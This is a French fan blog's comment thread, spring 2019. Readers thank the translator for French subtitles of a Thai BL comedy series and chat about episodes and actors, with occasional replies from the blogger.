    83
    Dimanche 21 Avril 2019 à 00:37

    merci!!!!!

     

    82
    Samedi 20 Avril 2019 à 20:18

    Merci beaucoup pour ce 3e épisode :)

    81
    Samedi 20 Avril 2019 à 18:25

    Merci beaucoup pour la traduction de ce nouvel episode !! :)

    80
    Samedi 20 Avril 2019 à 18:23

    Merci pour ce 3ème episode

    79
    Vendredi 19 Avril 2019 à 21:25

    ça a l'aire vraiment sympa^^

    78
    Vendredi 19 Avril 2019 à 17:01

    Merci pour se projet hâte de voir la suite 

    77
    Vendredi 19 Avril 2019 à 14:06

    J'ai hâte de commencer cette série, un grand merci pour ce projet !!^^!!

    76
    Vendredi 19 Avril 2019 à 01:29

    Merci pour ce magnifique projet. 

    75
    Jeudi 18 Avril 2019 à 23:03

    merci!!!!

    74
    Jeudi 18 Avril 2019 à 19:44

    merci pour la traduction de l'episode 2

    73
    Jeudi 18 Avril 2019 à 01:09

    Merci pour c'est episode bon courage pour la suite

    72
    Mercredi 17 Avril 2019 à 21:01

    Sympa cette série, je crois que je vais bien m’amuser, vivement la suite.

    merci bien pour cette traduction 

    71
    Mercredi 17 Avril 2019 à 20:33

    Merci pour ce 2e épisode :)

    70
    Mercredi 17 Avril 2019 à 19:38

    Merci pour la traduction de cette série j'ai terriblement hâte de voir la suite *-*

    69
    Mercredi 17 Avril 2019 à 13:53

    merci pour cette série

    hâte de la regardé

    68
    Mardi 16 Avril 2019 à 21:11

    j'adore  c'est hilarant rigolo 

    merci de le traduire 

      • Mardi 16 Avril 2019 à 21:13

        Merci pour ton commentaire, Finou22 !

        La série est plutôt drôle en effet.

        Espérons que la romance sera aussi un peu présente ^_^.

    67
    Mardi 16 Avril 2019 à 08:12

    Merci pour ce nouveau projet. Hâte de le découvrir. Bonne soirée à tous^^happywinktongue  

    66
    Mardi 16 Avril 2019 à 01:14

    Merci pour ce beau projet, que j'attendais avec beaucoup d'impatience ^^ Je n'avais pas compris à la première lecture que la relation concernerait un étudiant et un prof mais ça a eu le don en tout cas de m'intéresser davantage encore :)

    65
    Mardi 16 Avril 2019 à 00:07

    merci beaucoup pour ce projet

    64
    Lundi 15 Avril 2019 à 14:38

    Merci pour l épisode 1&2 de cette nouvelle série que j'ai hâte de découvrir!

    Bonne journée

     

    63
    Lundi 15 Avril 2019 à 08:34

    Merci beaucoup pour la traduction de ce deuxième episode ! 

    62
    Dimanche 14 Avril 2019 à 17:51

    Je n'ai pas trop accroché au 1er épisode mais la suite sera peut-être mieux ! En tout cas, merci de traduire cette série <3

    61
    Dimanche 14 Avril 2019 à 12:54

    Merci pour cette série ^^

    60
    Dimanche 14 Avril 2019 à 11:27

    Merci beaucoup pour ce premier épisode cool

    59
    Dimanche 14 Avril 2019 à 01:51

    excuser moi les traducteur de cette série sur youtube il y est mais en anglais et vous pouvez le reprendre pour la suite de ce BL répondez moi au plus vite et c'est pareille pour 2 brothers c'est pour vous aidé que je trouve les diffusion

      • Dimanche 14 Avril 2019 à 07:10

        Pas d'inquiétude : toutes les versions de la série ont les sous-titres anglais. C'est un choix des producteurs-diffuseurs.

    58
    Samedi 13 Avril 2019 à 20:46

    Elle a l'air bien cette petite série! Je vais la suivre de près. Merci beaucoup pour tout votre travail!

    57
    Samedi 13 Avril 2019 à 17:40

    merci pour le premier épisode cette serie a l'air super cool

    56
    Samedi 13 Avril 2019 à 17:31

    Encore merci de faire se projet trop bien j'ai hâte de voir la suite 

    55
    Samedi 13 Avril 2019 à 17:09

    Merci pour l'épisode 1happy

    54
    Jeudi 11 Avril 2019 à 17:22

    J'ai vraiment adoré ce premier episode ! merci beaucoup pour la traduction de cette serie !! 

    53
    Mercredi 10 Avril 2019 à 21:40

    MAIS POND IL PORTE UNE PERRUQUE J'SUIS CHOQU2E!! Merci de traduire ce projet!

      • Dimanche 14 Avril 2019 à 13:42

        Ha ha ha Effectivement, j'ai toujours surprenant et drôle... Mais je pense que cela arrive plus souvent qu'on ne le croit dans les séries. ^_^

        Les perruques permettent aussi à Pak de jouer les jumeaux.

    52
    Mercredi 10 Avril 2019 à 18:59

    merci beaucoup hâtede voir la suite ^^

    51
    Mercredi 10 Avril 2019 à 16:15

    Merci de traduire cette serie et bonne chance pour la suite wink2

    50
    Mardi 9 Avril 2019 à 22:40

    merci pour le 1er épisode !

    je crois que l'américain a un soucis XDD

    49
    Mardi 9 Avril 2019 à 19:58

    Merci pour ces sorties :)

    48
    Mardi 9 Avril 2019 à 18:04

    sur youtube il y ai mes pas en vostfr je fais sa pour vous aidez

     

     

    47
    Mardi 9 Avril 2019 à 17:44

    Merci pour ce projet! Ça fait plaisir de retrouver ce couple qui été déjà sympathique dans Love's Coming.

    46
    Lundi 8 Avril 2019 à 16:33

    merci  beaucoup pour cette série c'est très rafraîchissant! Je me tape des barres avec Thor et Tee !happy

    la sœur est un peu timbrée mais c'est tellement caricatural qu'on rigole!

    Contente de voir Best ( Good dans LBC ) et Kris ( Technic de LBC ) ^^

      • Dimanche 14 Avril 2019 à 13:44

        Coucou BL-FAN,

        Le point fort de cette série qui démarre est bel et bien l'humour.

        J'adore le perso de Thor, spontané et ridicule ! "You wanna see my hammer ?" ha ha ha ha

        La soeur homophobe est aussi franchement sympa !

        Merci de suivre la série sur le blog ! ^_^

    45
    Lundi 8 Avril 2019 à 09:29

    Un énorme merci pour la sortie de ce premier épisode ! Ce lakorn a l'air absolument génial et miam-mioum tout plein mwahahaha 

    44
    Dimanche 7 Avril 2019 à 22:59

    Merci pour ce premier épisode :)

    43
    Dimanche 7 Avril 2019 à 22:13

    ça à l'air super !! merci beaucoup !!smile

    42
    Dimanche 7 Avril 2019 à 20:54

    Merci, Hikôki-Gumo senseï, pour ce 1er épisode. J'ai hâte, terriblement hâte de le découvrir.

    Merci

      • Dimanche 14 Avril 2019 à 13:45

        Merci, Segi, pour ton soutien ! Espérons que la série sera cool et drôle jusqu'au bout ! ^_^

         

    41
    Dimanche 7 Avril 2019 à 20:40

    Merci pour la traduction de cette serie ! hâte de la découvrir !! :)

    40
    Dimanche 7 Avril 2019 à 20:32

    Bonsoir, merci beaucoup !

    39
    Dimanche 7 Avril 2019 à 19:21

    merci pour ce 1ére épisode.

    38
    Dimanche 7 Avril 2019 à 16:59

    hâte de voir la suite

    merci 

    37
    Dimanche 31 Mars 2019 à 23:37

    Merci pour ces sorties

     

    36
    Dimanche 31 Mars 2019 à 14:14

    Merci beaucoup pour ce projet, il a l'air superhappy

    35
    Vendredi 29 Mars 2019 à 11:11

    Merci beaucoup pour ce nouveau projet, hâte de le découvrir smile

    34
    Jeudi 28 Mars 2019 à 18:59

    Ce projet a l'air super !! Surtout avec le même couple que celui de Love's Coming, ce qui devient très intriguant!

    Merci encore à la team de traduire tout cela!

    33
    Mercredi 27 Mars 2019 à 11:29

    merci pour ce nouveau projet

    32
    Mardi 26 Mars 2019 à 18:07

    Bonjour,

    Merci beaucoup pour ce nouveau projet. De bons moments à venir en compagnie de ces très bons acteurs.

    Bonne continuation.

    31
    Lundi 25 Mars 2019 à 07:27
    Ça a l'air très mignon.
    30
    Dimanche 24 Mars 2019 à 21:20
    J'ai hâte de le voir ,la bande annonce est vraiment gènial ^^
    29
    Dimanche 24 Mars 2019 à 20:55

    Merci, oh Maître de nous proposer ce nouveau projet, particulièrement alléchant.

      • Dimanche 24 Mars 2019 à 21:12

        Je t'en prie, noble Segi ! C'est moi qui te suis redevable.

    28
    Daisy
    Dimanche 24 Mars 2019 à 20:27

    Merci pour ce projet ! Il a l'air géniale ! Très marrant ^^ et en plus je retrouve des acteurs que j'aime bien alors tout y est ! Vivement le 1er épisode =)

    27
    Dimanche 24 Mars 2019 à 20:26

    J'adore cette comédie BL, je me suis bien amusé à le regarder je pensais que c'était un film et je l'attendais avec impatience, mais c'est une série donc faudra être très patiente. Merci 

    26
    Dimanche 24 Mars 2019 à 18:53

    Merci pour ce projet .

    25
    Dimanche 24 Mars 2019 à 18:15

    Merci pour ce nouveau projet. Hâte de le découvrir. Bonne soirée à tous

    24
    Dimanche 24 Mars 2019 à 16:55

    merci pour ce projet !!smile

    23
    Dimanche 24 Mars 2019 à 16:35

    merci pour ce nouveau projet vraiment hâte de l’écouter yescool 

    22
    Dimanche 24 Mars 2019 à 16:05

    merci pour ce projet . Vivement la sortie

    21
    Dimanche 24 Mars 2019 à 15:38

    Merci pour ce projet, a voir mais a l'air intéressant

    20
    Dimanche 24 Mars 2019 à 15:37

    vraiment hâte Maître Hikôki-Gumo

    happyhappy  yes  cool

      • Dimanche 24 Mars 2019 à 19:19

        De rien, sire Jayl ! Premier commentaire ! ^_^

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :